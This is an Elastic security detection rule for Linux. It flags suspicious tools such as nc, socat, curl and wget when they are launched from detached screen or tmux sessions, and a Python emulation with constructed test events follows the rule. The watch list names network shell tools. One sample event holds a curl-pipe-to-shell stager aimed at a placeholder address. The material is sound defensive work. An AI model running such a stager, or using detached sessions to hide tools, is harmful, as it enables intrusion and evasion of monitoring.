Potentially Suspicious Process Started via tmux or screen
This rule monitors for the execution of suspicious commands whose parent process is screen or tmux. When a command is launched in a detached session (for example screen -dm followed by the command, or tmux new-session -d followed by the command), the multiplexer forks the command in the background, so its parent is screen or tmux rather than the user's interactive shell, and it keeps running after the user logs out. Attackers may leverage screen or tmux to run network, scripting and reconnaissance tools this way while attempting to evade detection.
Elastic rule
[metadata]
creation_date = "2023/09/04"
integration = ["endpoint"]
maturity = "production"
updated_date = "2024/10/17"

[rule]
author = ["Elastic"]
description = """
This rule monitors for the execution of suspicious commands via screen and tmux. When launching a command and detaching
directly, the commands will be executed in the background via its parent process. Attackers may leverage screen or tmux
to execute commands while attempting to evade detection.
"""
from = "now-9m"
index = ["logs-endpoint.events.*", "endgame-*"]
language = "eql"
license = "Elastic License v2"
name = "Potentially Suspicious Process Started via tmux or screen"
risk_score = 21
rule_id = "e0cc3807-e108-483c-bf66-5a4fbe0d7e89"
severity = "low"
tags = [
    "Domain: Endpoint",
    "OS: Linux",
    "Use Case: Threat Detection",
    "Tactic: Defense Evasion",
    "Data Source: Elastic Defend",
    "Data Source: Elastic Endgame",
]
timestamp_override = "event.ingested"
type = "eql"
query = '''
process where host.os.type == "linux" and event.type == "start" and event.action in ("exec", "exec_event") and
process.parent.name in ("screen", "tmux") and process.name like (
  "nmap", "nc", "ncat", "netcat", "socat", "nc.openbsd", "ngrok", "ping", "java", "php*", "perl", "ruby", "lua*",
  "openssl", "telnet", "wget", "curl", "id"
)
'''

[[rule.threat]]
framework = "MITRE ATT&CK"

[[rule.threat.technique]]
id = "T1218"
name = "System Binary Proxy Execution"
reference = "https://attack.mitre.org/techniques/T1218/"

[rule.threat.tactic]
id = "TA0005"
name = "Defense Evasion"
reference = "https://attack.mitre.org/tactics/TA0005/"
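To make the query's behaviour concrete, the following Python emulates each clause of the EQL predicate over a handful of constructed, ECS-shaped process events and reports which ones the rule would alert on. This is an added example, not Elastic's code and not part of the rule: the field names are taken from the query above, the events and their command lines are constructed to show how a detached screen or tmux launch appears in telemetry, and EQL's like operator is approximated with fnmatchcase (case-sensitive, with the * and ? wildcards).

```python
"""Emulate the rule's EQL predicate over constructed ECS-shaped process events.

Added example, not Elastic's code. Field names come from the rule's query; the
events below are constructed, not captured telemetry. EQL `like` is approximated
with fnmatchcase (case-sensitive glob with `*` and `?`).
"""
from fnmatch import fnmatchcase

MULTIPLEXER_PARENTS = {"screen", "tmux"}

# process.name patterns from the rule, verbatim; `php*` and `lua*` are globs.
SUSPICIOUS_CHILDREN = (
    "nmap", "nc", "ncat", "netcat", "socat", "nc.openbsd", "ngrok", "ping", "java",
    "php*", "perl", "ruby", "lua*", "openssl", "telnet", "wget", "curl", "id",
)


def matches_rule(event: dict) -> bool:
    """Return True when the event satisfies every clause of the EQL query."""
    if event.get("host", {}).get("os", {}).get("type") != "linux":
        return False

    ev = event.get("event", {})
    # ECS event.type may be a string or an array; EQL's == matches any element.
    types = ev.get("type", [])
    types = [types] if isinstance(types, str) else types
    if "start" not in types:
        return False
    # Only exec events count: a fork that has not yet exec'd is not considered.
    if ev.get("action") not in ("exec", "exec_event"):
        return False

    proc = event.get("process", {})
    if proc.get("parent", {}).get("name") not in MULTIPLEXER_PARENTS:
        return False

    name = proc.get("name", "")
    # `like` is case-sensitive; EQL's `like~` would be the case-insensitive form.
    return any(fnmatchcase(name, pattern) for pattern in SUSPICIOUS_CHILDREN)


def proc_event(name, parent, command_line="", action="exec", os_type="linux"):
    """Build a minimal constructed event in the ECS shape the query reads."""
    return {
        "host": {"os": {"type": os_type}},
        "event": {"type": ["start"], "action": action},
        "process": {"name": name, "command_line": command_line,
                    "parent": {"name": parent}},
    }


# Constructed scenarios; each command_line records how the child was launched.
STAGER = "curl -s http://192.0.2.10/stage | sh"
SAMPLE_EVENTS = [
    # `tmux new-session -d 'curl ...'`: the tmux server forks curl, parent is tmux.
    proc_event("curl", "tmux", STAGER),
    # `screen -dm php8.2 -r ...`: the php* glob covers versioned binaries.
    proc_event("php8.2", "screen", "php8.2 -r 'echo gethostname();'"),
    # Interactive use: tmux spawning the user's shell is expected and not listed.
    proc_event("bash", "tmux", "bash"),
    # Same curl launched from a plain shell: the parent clause fails.
    proc_event("curl", "bash", STAGER),
    # fork before exec: only exec/exec_event actions are evaluated.
    proc_event("curl", "tmux", STAGER, action="fork"),
    # Renamed copy differing only in case: `like` is case-sensitive, no match.
    proc_event("Curl", "tmux", "./Curl -s http://192.0.2.10/stage"),
]


def alerts(events):
    """Return the command lines the rule would alert on, in input order."""
    return [e["process"]["command_line"] for e in events if matches_rule(e)]


if __name__ == "__main__":
    for line in alerts(SAMPLE_EVENTS):
        print("ALERT:", line)
```

Running it alerts on the first two events only. The negative cases are the ones worth keeping in mind when tuning: the rule ignores the shell that tmux or screen normally spawns, ignores the same tools when launched from an ordinary shell, evaluates only exec events, and, because like is case-sensitive, will not match a binary copied under a differently cased name.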
Related rules
- Kernel Module Removal
- Potential Hidden Process via Mount Hidepid
- File made Immutable by Chattr
- Attempt to Disable IPTables or Firewall
- Attempt to Disable Syslog Service